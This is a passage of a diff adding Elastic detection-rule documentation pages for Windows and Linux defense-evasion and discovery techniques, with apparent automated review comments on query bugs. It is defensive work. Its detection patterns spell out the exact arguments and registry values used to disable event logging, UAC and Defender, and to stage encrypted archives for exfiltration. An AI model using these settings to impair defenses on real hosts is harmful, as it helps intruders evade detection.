Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + - Verify if any other anti-forensics behaviors were observed. +- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Re-enable affected logging components, services, and security monitoring. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ((process.name:"logman.exe" or process.pe.original_file_name == "Logman.exe") and + process.args : "EventLog-*" and process.args : ("stop", "delete")) or + + ((process.name : ("pwsh.exe", "powershell.exe", "powershell_ise.exe") or process.pe.original_file_name in + ("pwsh.exe", "powershell.exe", "powershell_ise.exe")) and + process.args : "Set-Service" and process.args: "EventLog" and process.args : "Disabled") or + + ((process.name:"auditpol.exe" or process.pe.original_file_name == "AUDITPOL.EXE") and process.args : "/success:disable") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Windows Event Logs +** ID: T1070.001 +** Reference URL: https://attack.mitre.org/techniques/T1070/001/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Sub-technique: +** Name: Indicator Blocking +** ID: T1562.006 +** Reference URL: https://attack.mitre.org/techniques/T1562/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc new file mode 100644 index 0000000000..6511040595 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc 
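Review bot: the PowerShell branch requires `Set-Service`, `EventLog` and `Disabled` to all appear in `process.args`, and the auditpol branch matches only `process.args : "/success:disable"`, so invocations that do not place those tokens on the command line (for example a cmdlet run from a script file) and audit-policy changes that use the failure-audit switch instead are outside this rule; the investigation guide should state that, so analysts do not treat the absence of an alert as evidence that logging is intact. Style point: the hunk mixes `process.name:"logman.exe"` and `process.name : ("pwsh.exe", ...)`; pick one spacing for the operator.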
@@ -0,0 +1,159 @@ +[[prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification]] +=== Disabling User Account Control via Registry Modification + +User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.greyhathacker.net/?p=796 +* https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings +* https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Disabling User Account Control via Registry Modification + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 
UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). + +Attackers may disable UAC to execute code directly in high integrity. This rule identifies registry value changes to bypass the UAC protection. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behaviors in the alert timeframe. +- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Analyze non-system processes executed with high integrity after UAC was disabled for unknown or suspicious processes. +- Retrieve the suspicious processes' executables and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled tasks creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. 
+ +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Restore UAC settings to the desired state. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.path : + ( + "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", + "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", + "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop" + ) and + registry.data.strings : ("0", "0x00000000") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: 
Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc new file mode 100644 index 0000000000..9a78bae996 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc 
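Review bot: the description expands UAC as "User Access Control" ("registry value changes to bypass User Access Control (UAC) protection") while the title and the guide use the correct "User Account Control"; fix the description. The tag list also lags the framework section: it carries `Tactic: Privilege Escalation` only, while the ATT&CK block maps the rule to Defense Evasion as well (T1548.002, T1562.001, T1112), so add `Tactic: Defense Evasion` or trim the mapping. Since the query fires only on `registry.data.strings : ("0", "0x00000000")`, the guide could say in one sentence that the three keys are being set to zero (UAC off, no admin prompt, no secure desktop), which is what an analyst needs to read the alert.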
@@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell]] +=== Disabling Windows Defender Security Settings via PowerShell + +Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Disabling Windows Defender Security Settings via PowerShell + +Microsoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks. + +This rule monitors the execution of commands that can tamper the Windows Defender antivirus features. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. 
+- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state, sample submission, etc. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed. + +### Related rules + +- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb +- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")) and + process.args : "Set-MpPreference" and process.args : ("-Disable*", "Disabled", "NeverSend", "-Exclusion*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc new file mode 100644 index 0000000000..28903385d7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc 
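Review bot: `process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")` in this rule uses `pwsh.dll`, while the Disable Windows Event and Security Logs rule earlier in this patch uses `pwsh.exe` for the same field; at most one of the two is right for PowerShell 7, so align them and note the chosen value. Because `process.args : ("-Disable*", "Disabled", "NeverSend", "-Exclusion*")` also catches exclusion additions and sample-submission changes, the description "disable or weaken certain Windows Defender settings" could name exclusions and sample submission explicitly so that it lines up with the false-positive guidance. Wording: "commands that can tamper the Windows Defender antivirus features" should read "tamper with".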
@@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry]] +=== DNS-over-HTTPS Enabled via Registry + +Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html +* https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + (registry.path : "*\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled" and + registry.data.strings : "1") or + (registry.path : "*\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode" and + registry.data.strings : "secure") or + (registry.path : "*\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS" and + registry.data.strings : "1") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: 
https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc new file mode 100644 index 0000000000..54f61bb7a8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc 
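Review bot: the DNS-over-HTTPS Enabled via Registry query has an operator-precedence bug. In EQL `and` binds tighter than `or`, so `host.os.type == "windows" and event.type in ("creation", "change")` applies only to the Edge `BuiltInDnsClientEnabled` branch; the Chrome `DnsOverHttpsMode` and Firefox `DNSOverHTTPS` branches match on any registry event type and any OS. Wrap the three `(registry.path : ... and registry.data.strings : ...)` branches in one outer pair of parentheses, i.e. `... and ( (edge) or (chrome) or (firefox) )`. Separately, the `[source, markdown]` Investigation guide block is empty; either fill it in or drop it so the page does not render a blank guide.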
@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-dynamic-linker-copy]] +=== Dynamic Linker Copy + +Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Orbit +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m +[process where host.os.type == "linux" and event.type == "start" and process.name : ("cp", "rsync") and + process.args : ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload")] +[file where host.os.type == "linux" and event.action == "creation" and file.extension == "so"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ 
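Review bot: the first stage of the Dynamic Linker Copy sequence lists a single loader path, `/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2`, so a copy taken through the `/lib64/ld-linux-x86-64.so.2` symlink or of the loader on a non-x86_64 host is not covered; matching the loader by name pattern (`*/ld-linux*.so*`) alongside `/etc/ld.so.preload` would be more robust. The second stage requires `file.extension == "so"`; if `file.extension` holds only the final suffix, a byte-for-byte copy named `ld-linux-x86-64.so.2` has extension `2` and will not satisfy it, so the description should say the rule fires when the backup is written under a `.so` name, or the second stage should match on `file.name : "ld-linux*"` as well.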
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc new file mode 100644 index 0000000000..22f0af9588 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc 
@@ -0,0 +1,124 @@ +[[prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z]] +=== Encrypting Files with WinRar or 7z + +Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Encrypting Files with WinRar or 7z + +Attackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less apparent upon inspection by a defender. + +These steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages. + +#### Possible investigation steps + +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Retrieve the encrypted file. 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Check if the password used in the encryption was included in the command line. +- Decrypt the `.rar`/`.zip` and check if the information is sensitive. +- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the file names included in the encrypted file. +- Investigate if the file was transferred to an attacker-controlled server. + +### False positive analysis + +- Backup software can use these utilities. Check the `process.parent.executable` and `process.parent.command_line` fields to determine what triggered the encryption. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Prioritize cases that involve personally identifiable information (PII) or other classified data. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ((process.name:"rar.exe" or process.code_signature.subject_name == "win.rar GmbH" or + process.pe.original_file_name == "Command line RAR") and + process.args == "a" and process.args : ("-hp*", "-p*", "-dw", "-tb", "-ta", "/hp*", "/p*", "/dw", "/tb", "/ta")) + + or + (process.pe.original_file_name in ("7z.exe", "7za.exe") and + process.args == "a" and process.args : ("-p*", "-sdel")) + + /* uncomment if noisy for backup software related FPs */ + /* not process.parent.executable : ("C:\\Program Files\\*.exe", "C:\\Program Files (x86)\\*.exe") */ +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Archive Collected Data +** ID: T1560 +** Reference URL: https://attack.mitre.org/techniques/T1560/ +* Sub-technique: +** Name: Archive via Utility +** ID: T1560.001 +** Reference URL: https://attack.mitre.org/techniques/T1560/001/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc new file mode 100644 index 0000000000..d150d39d54 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc 
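Review bot: the Encrypting Files with WinRar or 7z description ("to create an encrypted files", which also needs the article fixed) does not match the rule query. `-dw`, `-tb`, `-ta` and their `/` forms are not encryption switches (`-dw` wipes source files after archiving, `-ta`/`-tb` select files by modification date), and 7-Zip's `-sdel` deletes files after they are added; an alert can therefore fire with no password or encryption involved. Either restrict the argument list to `-hp*`, `-p*`, `/hp*`, `/p*`, or reword the title and description to say the rule covers archiving with encryption, source-file deletion, or date filtering. The guide's step "Check if the password used in the encryption was included in the command line" should likewise note that it only applies to the `-p`/`-hp` matches.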
@@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-enumeration-of-kernel-modules]] +=== Enumeration of Kernel Modules + +Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and ( + (process.name:(lsmod or modinfo)) or + (process.name:kmod and process.args:list) or + (process.name:depmod and process.args:(--all or -a)) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc new file mode 100644 index 0000000000..75a134219c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc 
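Review bot: the Enumeration of Kernel Modules page documents a `new_terms` rule but shows neither the field the new term is evaluated over nor the history window, and with `*References*: None` and no Investigation guide an analyst has nothing to tune against. `lsmod` and `modinfo` are routinely run by administrators and hardware or diagnostic tooling on healthy hosts, so add the new-terms field and history window to the page and a short False positive analysis section explaining that the alert means the tool was first seen for that term, not that enumeration is itself suspicious.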
@@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-esxi-discovery-via-find]] +=== ESXI Discovery via Find + +Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and process.name : "find" and +process.args : ("/etc/vmware/*", "/usr/lib/vmware/*", "/vmfs/*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Software Discovery +** ID: T1518 +** Reference URL: https://attack.mitre.org/techniques/T1518/ 
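Review bot: the ESXI Discovery via Find query omits `event.action == "exec"`, which the sibling ESXI Discovery via Grep and ESXI Timestomping rules in this package include; without it a fork-then-exec of `find` may produce two `start` events and two alerts for one command. Add the clause for consistency with the other two rules. Also, the product name is written `ESXi`; the title uses `ESXI` in all three rules.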
